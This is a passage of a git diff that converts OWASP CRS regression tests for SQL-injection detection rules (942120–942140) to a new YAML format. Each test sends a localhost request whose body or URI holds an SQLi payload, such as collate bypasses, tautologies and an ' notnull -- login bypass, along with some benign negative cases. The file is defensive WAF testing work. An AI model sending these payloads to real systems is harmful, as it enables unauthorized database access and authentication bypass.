text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%60nocase%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 30 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=user'collate%20foo--" - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-31 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=user'collate%20foo--" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 31 desc: "Invalid SQL collate foo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate`utf8mb4_general_ci` - data: "var=user'collate%60utf8mb4_general_ci%60--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-32 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate`utf8mb4_general_ci` + data: "var=user'collate%60utf8mb4_general_ci%60--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 32 desc: "Collate bypass with character escaping" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate"\utf8mb4_general_ci" - data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-33 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate"\utf8mb4_general_ci" + data: "var=user'collate%22%5Cutf8mb4_general_ci%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 33 desc: "Collate bypass with postgress string escaping U&" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # collate U&"\0441\043B\043E\043D" - data: "var=user'collate U%26%22%241%23B%23E%23D%22--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-34 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # collate U&"\0441\043B\043E\043D" + data: "var=user'collate U%26%22%241%23B%23E%23D%22--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 34 desc: "Detect auth bypass email=' notnull --" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=%27%20notnull%20--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-35 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=%27%20notnull%20--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 35 desc: "Test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" - version: HTTP/1.0 - output: - log_contains: id "942120" - - test_title: 942120-36 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "email=admin%40juice-sh.op'and%20unlikely%20(id)--" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] + - test_id: 36 desc: "Negative test for IJ5N1CXB - unlikely" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: - text=It is highly unlikely this is going to be a false positive - version: HTTP/1.0 - output: - no_log_contains: id "942120" - - test_title: 942120-37 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: text=It is highly unlikely this is going to be a false positive + version: HTTP/1.0 + output: + log: + no_expect_ids: [942120] + - test_id: 37 desc: "Test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' - version: HTTP/1.1 - output: - log_contains: id "942120" - - test_title: 942120-38 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + email=admin%40juice-sh.op\'%20and(%20likelihood%20(id,.0));' + version: HTTP/1.1 + output: + log: + expect_ids: [942120] + - test_id: 38 desc: "Negative test for HOH7M88Q - likelihood" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: | - text=After calculating the likelihood this should not be matched. - version: HTTP/1.1 - output: - no_log_contains: id "942120" - - test_title: 942120-39 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: | + text=After calculating the likelihood this should not be matched. + version: HTTP/1.1 + output: + log: + no_expect_ids: [942120] + - test_id: 39 desc: "Detect path-based SQLi attempt" stages: - - stage: - input: - dest_addr: 127.0.0.1 - port: 80 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: "*/*" - method: POST - uri: "/post/catalogue/rest/products/2499999||this.product/reviews" - version: HTTP/1.0 - output: - log_contains: id "942120" + - input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: "*/*" + method: POST + uri: "/post/catalogue/rest/products/2499999||this.product/reviews" + version: HTTP/1.0 + output: + log: + expect_ids: [942120] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml index 594e372cf..c4d4e9983 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942130.yaml @@ -1,160 +1,158 @@ --- meta: author: "Christian S.J. Peron and Allan Boll, Franziska Bühler, azurit" - description: None - enabled: true - name: 942130.yaml +rule_id: 942130 tests: - - test_title: 942130-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" - version: HTTP/1.0 - output: - no_log_contains: id "942130" - - test_title: 942130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%221%22%20sSOUNDS%20LIKE%20%22SOUNDS%20LIKE%201&other_var=test" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942130] + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11=1" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11=1" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=b,1=1" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=b,1=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology - like" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a=42%20like%2042" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a=42%20like%2042" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 8 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=This%20is%20like%20no%20other" - version: HTTP/1.1 - output: - no_log_contains: id "942130" - - test_title: 942130-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=This%20is%20like%20no%20other" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942130] + - test_id: 9 desc: "SQL Injection Attack: SQL Tautology using MySQL NULL-safe operator <=>" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=42<=>42" - version: HTTP/1.1 - output: - log_contains: id "942130" - - test_title: 942130-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=42<=>42" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] + - test_id: 10 desc: "SQL Injection Attack: SQL Tautology using glob" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" - version: HTTP/1.1 - output: - log_contains: id "942130" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?user=admin%40juice-sh.op'%20and%20password%20glob%20password;" + version: HTTP/1.1 + output: + log: + expect_ids: [942130] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml index 934a8ac84..37712c37d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942131.yaml @@ -2,113 +2,112 @@ meta: author: "Felipe Zipitria" description: SQL Tautology - enabled: true - name: 942131.yaml +rule_id: 942131 tests: - - test_title: 942131-1 + - test_id: 1 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=1" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=1" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 2 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1!=11" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1!=11" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 3 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=11!=11" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=11!=11" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] + - test_id: 4 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%202" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%202" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 5 desc: "SQL Injection Attack: SQL Tautology negative" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - uri: "/get?a=1%20is%20not%201" - version: HTTP/1.1 - output: - no_log_contains: id "942131" - - test_title: 942131-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + uri: "/get?a=1%20is%20not%201" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] + - test_id: 6 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '2'" - version: HTTP/1.1 - output: - log_contains: id "942131" - - test_title: 942131-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '2'" + version: HTTP/1.1 + output: + log: + expect_ids: [942131] + - test_id: 7 desc: "SQL Injection Attack: SQL Tautology" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - uri: "/post" - data: "a='1' not regexp '1'" - version: HTTP/1.1 - output: - no_log_contains: id "942131" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/post" + data: "a='1' not regexp '1'" + version: HTTP/1.1 + output: + log: + no_expect_ids: [942131] diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml index e05f3f23c..421fedd10 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942140.yaml @@ -1,295 +1,293 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, azurit" - description: None - enabled: true - name: 942140.yaml +rule_id: 942140 tests: - - test_title: 942140-1 + - test_id: 1 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?sql_table=pg_catalog" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?sql_table=pg_catalog" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 2 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "INFORMATION_SCHEMA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "INFORMATION_SCHEMA" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 3 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "database(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 4 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "db_name(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "db_name(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 5 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DaTaBasE(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DaTaBasE(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 6 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "InFoRmaTioN_ScHemA" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "InFoRmaTioN_ScHemA" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 7 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "DB_NAME(" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "DB_NAME(" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 8 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "tempdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "tempdb" + version: HTTP/1.0 + output: + log: + expect_ids: [942140] + - test_id: 9 desc: "SQL Injection Attack: Common DB Names Detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "msdb" - version: HTTP/1.0 - output: - log_contains: id "942140" - - test_title: 942140-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 